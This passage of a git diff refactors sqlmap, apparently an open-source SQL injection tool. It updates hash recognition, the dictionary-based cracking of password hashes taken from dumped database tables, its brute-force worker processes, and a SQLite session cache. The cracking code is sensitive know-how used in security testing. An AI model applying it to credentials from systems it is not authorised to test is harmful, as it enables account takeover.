column != "__infos__" and table[column]["values"]: + if all(INVALID_UNICODE_CHAR_FORMAT.split('%')[0] in (value or "") for value in table[column]["values"]): + binary_fields.add(column) + + if binary_fields: + _ = ','.join(binary_fields) + warnMsg = "potential binary fields detected ('%s'). In case of any problems you are " % _ + warnMsg += "advised to rerun table dump with '--fresh-queries --binary-fields=\"%s\"'" % _ + logger.warning(warnMsg) + for i in xrange(count): if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD: break for column in columns: - if column == col_user or column == '__infos__': + if column == col_user or column == "__infos__": + continue + + if len(table[column]["values"]) <= i: continue - if len(table[column]['values']) <= i: + if conf.binaryFields and column in conf.binaryFields: continue - value = table[column]['values'][i] + value = table[column]["values"][i] + + if column in binary_fields and re.search(HASH_BINARY_COLUMNS_REGEX, column) is not None: + previous = value + value = encodeHex(getBytes(value), binary=False) + replacements[value] = previous if hashRecognition(value): found = True - if col_user and i < len(table[col_user]['values']): - if table[col_user]['values'][i] not in attack_dict: - attack_dict[table[col_user]['values'][i]] = [] + if col_user and i < len(table[col_user]["values"]): + if table[col_user]["values"][i] not in attack_dict: + attack_dict[table[col_user]["values"][i]] = [] - attack_dict[table[col_user]['values'][i]].append(value) + attack_dict[table[col_user]["values"][i]].append(value) else: - attack_dict['%s%d' % (DUMMY_USER_PREFIX, i)] = [value] + attack_dict["%s%d" % (DUMMY_USER_PREFIX, i)] = [value] col_passwords.add(column) @@ -397,11 +757,11 @@ def attackDumpedTable(): storeHashesToFile(attack_dict) message = "do you want to crack them via a dictionary-based attack? %s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]") - test = readInput(message, default="N" if conf.multipleTargets else "Y") + choice = readInput(message, default='N' if conf.multipleTargets else 'Y').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException results = dictionaryAttack(attack_dict) @@ -409,10 +769,12 @@ def attackDumpedTable(): for (_, hash_, password) in results: if hash_: - lut[hash_.lower()] = password + key = hash_ if hash_ not in replacements else replacements[hash_] + lut[key.lower()] = password + lut["0x%s" % key.lower()] = password - infoMsg = "postprocessing table dump" - logger.info(infoMsg) + debugMsg = "post-processing table dump" + logger.debug(debugMsg) for i in xrange(count): for column in columns: @@ -420,34 +782,55 @@ def attackDumpedTable(): value = table[column]['values'][i] if value and value.lower() in lut: - table[column]['values'][i] += " (%s)" % lut[value.lower()] + table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()] or HASH_EMPTY_PASSWORD_MARKER)) table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i])) +@cachedmethod def hashRecognition(value): + """ + >>> hashRecognition("179ad45c6ce2cb97cf1029e212046e81") == HASH.MD5_GENERIC + True + >>> hashRecognition("S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C") == HASH.ORACLE + True + >>> hashRecognition("foobar") == None + True + """ + retVal = None - isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL) + if value and len(value) >= 8 and ' ' not in value: # Note: pre-filter condition (for optimization purposes) + isOracle, isMySQL = Backend.isDbms(DBMS.ORACLE), Backend.isDbms(DBMS.MYSQL) - if isinstance(value, basestring): - for name, regex in getPublicTypeMembers(HASH): - # Hashes for Oracle and old MySQL look the same hence these checks - if isOracle and regex == HASH.MYSQL_OLD: - continue - elif isMySQL and regex == HASH.ORACLE_OLD: - continue - elif regex == HASH.CRYPT_GENERIC: - if any((value.lower() == value, value.upper() == value)): + if kb.cache.hashRegex is None: + parts = [] + + for name, regex in getPublicTypeMembers(HASH): + # Hashes for Oracle and old MySQL look the same hence these checks + if isOracle and regex == HASH.MYSQL_OLD or isMySQL and regex == HASH.ORACLE_OLD: continue - elif re.match(regex, value): - retVal = regex - break + elif regex == HASH.CRYPT_GENERIC: + if any((value.lower() == value, value.upper() == value)): + continue + else: + parts.append("(?P<%s>%s)" % (name, regex)) + + kb.cache.hashRegex = ('|'.join(parts)).replace("(?i)", "") + + if isinstance(value, six.string_types): + match = re.search(kb.cache.hashRegex, value, re.I) + if match: + algorithm, _ = [_ for _ in match.groupdict().items() if _[1] is not None][0] + retVal = getattr(HASH, algorithm) return retVal -def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): +def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist, api): + if IS_WIN: + coloramainit() + count = 0 rotator = 0 - hashes = set([item[0][1] for item in attack_info]) + hashes = set(item[0][1] for item in attack_info) wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) @@ -456,7 +839,11 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc if not attack_info: break - if not isinstance(word, basestring): + count += 1 + + if isinstance(word, six.binary_type): + word = getUnicode(word) + elif not isinstance(word, six.string_types): continue if suffix: @@ -465,8 +852,6 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc try: current = __functions__[hash_regex](password=word, uppercase=False) - count += 1 - if current in hashes: for item in attack_info[:]: ((user, hash_), _) = item @@ -489,10 +874,14 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 + if rotator >= len(ROTATING_CHARS): rotator = 0 - status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) + + status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) + + if not api: + dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise @@ -500,19 +889,23 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries - except: - warnMsg = "there was a problem while hashing entry: %s. " % repr(word) - warnMsg += "Please report by e-mail to %s" % ML + except Exception as ex: + warnMsg = "there was a problem while hashing entry: %s ('%s'). " % (repr(word), getSafeExString(ex)) + warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS logger.critical(warnMsg) except KeyboardInterrupt: pass finally: - if hasattr(proc_count, 'value'): - proc_count.value -= 1 + if hasattr(proc_count, "value"): + with proc_count.get_lock(): + proc_count.value -= 1 + +def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist, api): + if IS_WIN: + coloramainit() -def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist): count = 0 rotator = 0 @@ -523,16 +916,19 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found if found.value: break - current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) count += 1 - if not isinstance(word, basestring): + if isinstance(word, six.binary_type): + word = getUnicode(word) + elif not isinstance(word, six.string_types): continue if suffix: word = word + suffix try: + current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) + if hash_ == current: if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes word = word.upper() @@ -552,14 +948,19 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found found.value = True - elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: + elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: rotator += 1 + if rotator >= len(ROTATING_CHARS): rotator = 0 - status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) - if not user.startswith(DUMMY_USER_PREFIX): - status += ' (user: %s)' % user - dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) + + status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) + + if user and not user.startswith(DUMMY_USER_PREFIX): + status += " (user: %s)" % user + + if not api: + dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise @@ -567,38 +968,63 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries - except Exception, e: - warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e) - warnMsg += "Please report by e-mail to %s" % ML + except Exception as ex: + warnMsg = "there was a problem while hashing entry: %s ('%s'). " % (repr(word), getSafeExString(ex)) + warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS logger.critical(warnMsg) except KeyboardInterrupt: pass finally: - if hasattr(proc_count, 'value'): - proc_count.value -= 1 + if hasattr(proc_count, "value"): + with proc_count.get_lock(): + proc_count.value -= 1 def dictionaryAttack(attack_dict): + global _multiprocessing + suffix_list = [""] - custom_wordlist = [] + custom_wordlist = [""] hash_regexes = [] results = [] resumes = [] - processException = False user_hash = [] + processException = False + foundHash = False + + if conf.disableMulti: + _multiprocessing = None + else: + # Note: https://github.com/sqlmapproject/sqlmap/issues/4367 + try: + import multiprocessing + + # problems on FreeBSD (Reference: https://web.archive.org/web/20110710041353/http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx) + _ = multiprocessing.Queue() + + # problems with ctypes (Reference: https://github.com/sqlmapproject/sqlmap/issues/2952) + _ = multiprocessing.Value('i') + except (ImportError, OSError, AttributeError): + pass + else: + try: + if multiprocessing.cpu_count() > 1: + _multiprocessing = multiprocessing + except NotImplementedError: + pass for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue - hash_ = hash_.split()[0] + hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) - infoMsg = "using hash method '%s'" % __functions__[regex].func_name + infoMsg = "using hash method '%s'" % __functions__[regex].__name__ logger.info(infoMsg) for hash_regex in hash_regexes: @@ -610,39 +1036,64 @@ def dictionaryAttack(attack_dict): if not hash_: continue - hash_ = hash_.split()[0] + foundHash = True + hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): - item = None - - if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS): - hash_ = hash_.lower() - - if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): - item = [(user, hash_), {}] - elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): - item = [(user, hash_), {'username': user}] - elif hash_regex in (HASH.ORACLE): - item = [(user, hash_), {'salt': hash_[-20:]}] - elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD): - item = [(user, hash_), {'salt': hash_[6:14]}] - elif hash_regex in (HASH.CRYPT_GENERIC): - item = [(user, hash_), {'salt': hash_[0:2]}] - elif hash_regex in (HASH.WORDPRESS): - item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] - - if item and hash_ not in keys: - resumed = hashDBRetrieve(hash_) - if not resumed: - attack_info.append(item) - user_hash.append(item[0]) - else: - infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) - if user and not user.startswith(DUMMY_USER_PREFIX): - infoMsg += " for user '%s'" % user - logger.info(infoMsg) - resumes.append((user, hash_, resumed)) - keys.add(hash_) + try: + item = None + + if hash_regex not in (HASH.CRYPT_GENERIC, HASH.JOOMLA, HASH.PHPASS, HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD, HASH.SSHA, HASH.SSHA256, HASH.SSHA512, HASH.DJANGO_MD5, HASH.DJANGO_SHA1, HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): + hash_ = hash_.lower() + + if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): + item = [(user, encodeHex(decodeBase64(hash_, binary=True))), {}] + elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1): + if hash_.startswith("0x"): # Reference: https://docs.microsoft.com/en-us/sql/t-sql/functions/hashbytes-transact-sql?view=sql-server-2017 + hash_ = hash_[2:] + item = [(user, hash_), {}] + elif hash_regex in (HASH.SSHA,): + item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[20:]}] + elif hash_regex in (HASH.SSHA256,): + item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[32:]}] + elif hash_regex in (HASH.SSHA512,): + item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[64:]}] + elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): + item = [(user, hash_), {'username': user}] + elif hash_regex in (HASH.ORACLE,): + item = [(user, hash_), {"salt": hash_[-20:]}] + elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): + item = [(user, hash_), {"salt": hash_[6:14]}] + elif hash_regex in (HASH.CRYPT_GENERIC,): + item = [(user, hash_), {"salt": hash_[0:2]}] + elif hash_regex in (HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT): + item = [(user, hash_), {"salt": hash_.split('$')[2], "magic": "$%s$" % hash_.split('$')[1]}] + elif hash_regex in (HASH.JOOMLA, HASH.VBULLETIN, HASH.VBULLETIN_OLD, HASH.OSCOMMERCE_OLD): + item = [(user, hash_), {"salt": hash_.split(':')[-1]}] + elif hash_regex in (HASH.DJANGO_MD5, HASH.DJANGO_SHA1): + item = [(user, hash_), {"salt": hash_.split('$')[1]}] + elif hash_regex in (HASH.PHPASS,): + if ITOA64.index(hash_[3]) < 32: + item = [(user, hash_), {"salt": hash_[4:12], "count": 1 << ITOA64.index(hash_[3]), "prefix": hash_[:3]}] + else: + warnMsg = "invalid hash '%s'" % hash_ + logger.warning(warnMsg) + + if item and hash_ not in keys: + resumed = hashDBRetrieve(hash_) + if not resumed: + attack_info.append(item) + user_hash.append(item[0]) + else: + infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) + if user and not user.startswith(DUMMY_USER_PREFIX): + infoMsg += " for user '%s'" % user + logger.info(infoMsg) + resumes.append((user, hash_, resumed)) + keys.add(hash_) + + except (binascii.Error, TypeError, IndexError): + pass if not attack_info: continue @@ -651,7 +1102,7 @@ def dictionaryAttack(attack_dict): while not kb.wordlists: # the slowest of all methods hence smaller default dict - if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS): + if hash_regex in (HASH.ORACLE_OLD, HASH.PHPASS): dictPaths = [paths.SMALL_DICT] else: dictPaths = [paths.WORDLIST] @@ -660,41 +1111,50 @@ def dictionaryAttack(attack_dict): message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" - choice = readInput(message, default="1") + choice = readInput(message, default='1') try: - if choice == "2": + if choice == '2': message = "what's the custom dictionary's location?\n" - dictPaths = [readInput(message)] - - logger.info("using custom dictionary") - elif choice == "3": + dictPath = readInput(message) + if dictPath: + dictPaths = [dictPath] + logger.info("using custom dictionary") + elif choice == '3': message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) - logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") + dictPaths = [_ for _ in dictPaths if _] + for dictPath in dictPaths: checkFile(dictPath) + if isZipFile(dictPath): + _ = zipfile.ZipFile(dictPath, 'r') + if len(_.namelist()) == 0: + errMsg = "no file(s) inside '%s'" % dictPath + raise SqlmapDataException(errMsg) + else: + _.open(_.namelist()[0]) + kb.wordlists = dictPaths - except SqlmapFilePathException, msg: + except Exception as ex: warnMsg = "there was a problem while loading dictionaries" - warnMsg += " ('%s')" % msg + warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " - test = readInput(message, default="N") - if test[0] in ("y", "Y"): + if readInput(message, default='N', boolean=True): suffix_list += COMMON_PASSWORD_SUFFIXES - infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name + infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].__name__ logger.info(infoMsg) for item in attack_info: @@ -702,7 +1162,8 @@ def dictionaryAttack(attack_dict): if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) - if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): + # Algorithms without extra arguments (e.g. salt and/or username) + if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1): for suffix in suffix_list: if not attack_info or processException: break @@ -721,51 +1182,38 @@ def dictionaryAttack(attack_dict): infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) + gc.disable() + retVal = _multiprocessing.Queue() count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) + process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api)) + processes.append(process) - for p in processes: - p.start() + for process in processes: + process.daemon = True + process.start() - for p in processes: - p.join() + while count.value > 0: + time.sleep(0.5) else: warnMsg = "multiprocessing hash cracking is currently " - warnMsg += "not supported on this platform" + warnMsg += "%s on this platform" % ("not supported" if not conf.disableMulti else "disabled") singleTimeWarnMessage(warnMsg) - retVal = Queue() - _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) + retVal = _queue.Queue() + _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api) except KeyboardInterrupt: - print + print() processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" - logger.warn(warnMsg) - - for process in processes: - try: - process.terminate() - process.join() - except OSError: - pass + logger.warning(warnMsg) finally: - if retVal: - conf.hashDB.beginTransaction() - - while not retVal.empty(): - user, hash_, word = item = retVal.get(block=False) - attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) - hashDBWrite(hash_, word) - results.append(item) - - conf.hashDB.endTransaction() + _finalize(retVal, results, processes, attack_info) clearConsoleLine() @@ -798,73 +1246,85 @@ def dictionaryAttack(attack_dict): infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) + gc.disable() + retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) + process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api)) + processes.append(process) - for p in processes: - p.start() + for process in processes: + process.daemon = True + process.start() - for p in processes: - p.join() + while count.value > 0: + time.sleep(0.5) found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " - warnMsg += "not supported on this platform" + warnMsg += "%s on this platform" % ("not supported" if not conf.disableMulti else "disabled") singleTimeWarnMessage(warnMsg) - class Value(): + class Value(object): pass - retVal = Queue() + retVal = _queue.Queue() found_ = Value() found_.value = False - _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) + _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api) found = found_.value except KeyboardInterrupt: - print + print() processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" - logger.warn(warnMsg) + logger.warning(warnMsg) for process in processes: try: process.terminate() process.join() - except OSError: + except (OSError, AttributeError): pass finally: - if retVal: - conf.hashDB.beginTransaction() - - while not retVal.empty(): - user, hash_, word = item = retVal.get(block=False) - hashDBWrite(hash_, word) - results.append(item) - - conf.hashDB.endTransaction() + _finalize(retVal, results, processes, attack_info) clearConsoleLine() results.extend(resumes) - if len(hash_regexes) == 0: - warnMsg = "unknown hash format. " - warnMsg += "Please report by e-mail to %s" % ML - logger.warn(warnMsg) + if foundHash and len(hash_regexes) == 0: + warnMsg = "unknown hash format" + logger.warning(warnMsg) if len(results) == 0: warnMsg = "no clear password(s) found" - logger.warn(warnMsg) + logger.warning(warnMsg) return results + +def crackHashFile(hashFile): + i = 0 + attack_dict = {} + + check = None + for line in getFileItems(conf.hashFile): + if check is None and not attack_dict and ':' in line: + check = any(re.search(_, line) for _ in getPublicTypeMembers(HASH, True)) + + if ':' in line and check is False: + user, hash_ = line.split(':', 1) + attack_dict[user] = [hash_] + else: + attack_dict["%s%d" % (DUMMY_USER_PREFIX, i)] = [line] + i += 1 + + dictionaryAttack(attack_dict) diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py index 4e3f1a4e6b2..e7a88fc22cd 100644 --- a/lib/utils/hashdb.py +++ b/lib/utils/hashdb.py @@ -1,108 +1,168 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import hashlib import os import sqlite3 +import struct import threading import time -from lib.core.common import getUnicode +from lib.core.common import getSafeExString from lib.core.common import serializeObject +from lib.core.common import singleTimeWarnMessage from lib.core.common import unserializeObject +from lib.core.compat import xrange +from lib.core.convert import getBytes +from lib.core.convert import getUnicode from lib.core.data import logger -from lib.core.exception import SqlmapDataException +from lib.core.datatype import LRUDict +from lib.core.exception import SqlmapConnectionException +from lib.core.settings import HASHDB_END_TRANSACTION_RETRIES from lib.core.settings import HASHDB_FLUSH_RETRIES -from lib.core.settings import HASHDB_FLUSH_THRESHOLD -from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import HASHDB_FLUSH_THRESHOLD_ITEMS +from lib.core.settings import HASHDB_FLUSH_THRESHOLD_TIME +from lib.core.settings import HASHDB_RETRIEVE_RETRIES +from lib.core.settings import IS_PYPY from lib.core.threads import getCurrentThreadData -from lib.core.threads import getCurrentThreadName +from thirdparty import six class HashDB(object): def __init__(self, filepath): self.filepath = filepath self._write_cache = {} + self._read_cache = LRUDict(capacity=100) self._cache_lock = threading.Lock() + self._connections = [] + self._last_flush_time = time.time() def _get_cursor(self): threadData = getCurrentThreadData() if threadData.hashDBCursor is None: try: - connection = sqlite3.connect(self.filepath, timeout=3, isolation_level=None) + connection = sqlite3.connect(self.filepath, timeout=10, isolation_level=None, check_same_thread=False) + if not IS_PYPY: + connection.execute("PRAGMA journal_mode=WAL") + connection.execute("PRAGMA synchronous=NORMAL") + connection.execute("PRAGMA busy_timeout=10000") + self._connections.append(connection) threadData.hashDBCursor = connection.cursor() threadData.hashDBCursor.execute("CREATE TABLE IF NOT EXISTS storage (id INTEGER PRIMARY KEY, value TEXT)") - except Exception, ex: + connection.commit() + except Exception as ex: errMsg = "error occurred while opening a session " - errMsg += "file '%s' ('%s')" % (self.filepath, ex) - raise SqlmapDataException(errMsg) + errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) return threadData.hashDBCursor - cursor = property(_get_cursor) + def _set_cursor(self, cursor): + threadData = getCurrentThreadData() + threadData.hashDBCursor = cursor + + cursor = property(_get_cursor, _set_cursor) def close(self): threadData = getCurrentThreadData() try: if threadData.hashDBCursor: + if self._write_cache: + self.flush() + threadData.hashDBCursor.close() threadData.hashDBCursor.connection.close() threadData.hashDBCursor = None except: pass + def closeAll(self): + if self._write_cache: + self.flush() + + for connection in self._connections: + try: + connection.close() + except: + pass + @staticmethod def hashKey(key): - key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key) - retVal = int(hashlib.md5(key).hexdigest()[:8], 16) + key = getBytes(key if isinstance(key, six.text_type) else repr(key), errors="xmlcharrefreplace") + retVal = struct.unpack("<Q", hashlib.md5(key).digest()[:8])[0] & 0x7fffffffffffffff return retVal def retrieve(self, key, unserialize=False): retVal = None - if key and (self._write_cache or os.path.isfile(self.filepath)): + + if key and (self._write_cache or self._connections or os.path.isfile(self.filepath)): hash_ = HashDB.hashKey(key) retVal = self._write_cache.get(hash_) + + if retVal is None: + retVal = self._read_cache.get(hash_) + if not retVal: - while True: + for _ in xrange(HASHDB_RETRIEVE_RETRIES): try: for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)): retVal = row[0] - except sqlite3.OperationalError, ex: - if not 'locked' in ex.message: - raise + except (sqlite3.OperationalError, sqlite3.DatabaseError) as ex: + if any(_ in getSafeExString(ex) for _ in ("locked", "no such table")): + warnMsg = "problem occurred while accessing session file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + singleTimeWarnMessage(warnMsg) + elif "Could not decode" in getSafeExString(ex): + break + else: + errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, getSafeExString(ex)) + errMsg += "If the problem persists please rerun with '--flush-session'" + raise SqlmapConnectionException(errMsg) else: break - return retVal if not unserialize else unserializeObject(retVal) + + time.sleep(1) + + if retVal is not None: + self._read_cache[hash_] = retVal + + if retVal and unserialize: + try: + retVal = unserializeObject(retVal) + except: + retVal = None + warnMsg = "error occurred while unserializing value for session key '%s'. " % key + warnMsg += "If the problem persists please rerun with '--flush-session'" + logger.warning(warnMsg) + + return retVal def write(self, key, value, serialize=False): if key: hash_ = HashDB.hashKey(key) - self._cache_lock.acquire() - self._write_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value) - self._cache_lock.release() + with self._cache_lock: + self._write_cache[hash_] = self._read_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value) + cache_size = len(self._write_cache) + time_since_flush = time.time() - self._last_flush_time - if getCurrentThreadName() in ('0', 'MainThread'): - self.flush() - - def flush(self, forced=False): - if not self._write_cache: - return + if cache_size >= HASHDB_FLUSH_THRESHOLD_ITEMS or time_since_flush >= HASHDB_FLUSH_THRESHOLD_TIME: + self.flush() - if not forced and len(self._write_cache) < HASHDB_FLUSH_THRESHOLD: - return + def flush(self): + with self._cache_lock: + if not self._write_cache: + return - self._cache_lock.acquire() - _ = self._write_cache - self._write_cache = {} - self._cache_lock.release() + flush_cache = self._write_cache + self._write_cache = {} + self._last_flush_time = time.time() try: self.beginTransaction() - for hash_, value in _.items(): + for hash_, value in flush_cache.items(): retries = 0 while True: try: @@ -110,12 +170,19 @@ def flush(self, forced=False): self.cursor.execute("INSERT INTO storage VALUES (?, ?)", (hash_, value,)) except sqlite3.IntegrityError: self.cursor.execute("UPDATE storage SET value=? WHERE id=?", (value, hash_,)) - except sqlite3.OperationalError, ex: - - if retries == 0: + except (UnicodeError, OverflowError): # e.g. surrogates not allowed (Issue #3851) + break + except sqlite3.DatabaseError as ex: + if not os.path.exists(self.filepath): + debugMsg = "session file '%s' does not exist" % self.filepath + logger.debug(debugMsg) + break + + # NOTE: skipping the retries == 0 for graceful resolution of multi-threaded runs + if retries == 1: warnMsg = "there has been a problem while writing to " - warnMsg += "the session file ('%s')" % ex.message - logger.warn(warnMsg) + warnMsg += "the session file ('%s')" % getSafeExString(ex) + logger.warning(warnMsg) if retries >= HASHDB_FLUSH_RETRIES: return @@ -130,15 +197,43 @@ def flush(self, forced=False): def beginTransaction(self): threadData = getCurrentThreadData() if not threadData.inTransaction: - self.cursor.execute('BEGIN TRANSACTION') - threadData.inTransaction = True + try: + self.cursor.execute("BEGIN TRANSACTION") + except: + try: + # Reference: http://stackoverflow.com/a/25245731 + self.cursor.close() + except sqlite3.ProgrammingError: + pass + threadData.hashDBCursor = None + self.cursor.execute("BEGIN TRANSACTION") + finally: + threadData.inTransaction = True def endTransaction(self): threadData = getCurrentThreadData() if threadData.inTransaction: + retries = 0 + while retries < HASHDB_END_TRANSACTION_RETRIES: + try: + self.cursor.execute("END TRANSACTION") + threadData.inTransaction = False + except sqlite3.OperationalError: + pass + except sqlite3.ProgrammingError: + self.cursor = None + threadData.inTransaction = False + return + else: + return + + retries += 1 + time.sleep(1) + try: - self.cursor.execute('END TRANSACTION') + self.cursor.execute("ROLLBACK TRANSACTION") except sqlite3.OperationalError: - pass + self.cursor.close() + self.cursor = None finally: threadData.inTransaction = False diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py index fd055430b05..70d139ee244 100644 --- a/lib/utils/pivotdumptable.py +++ 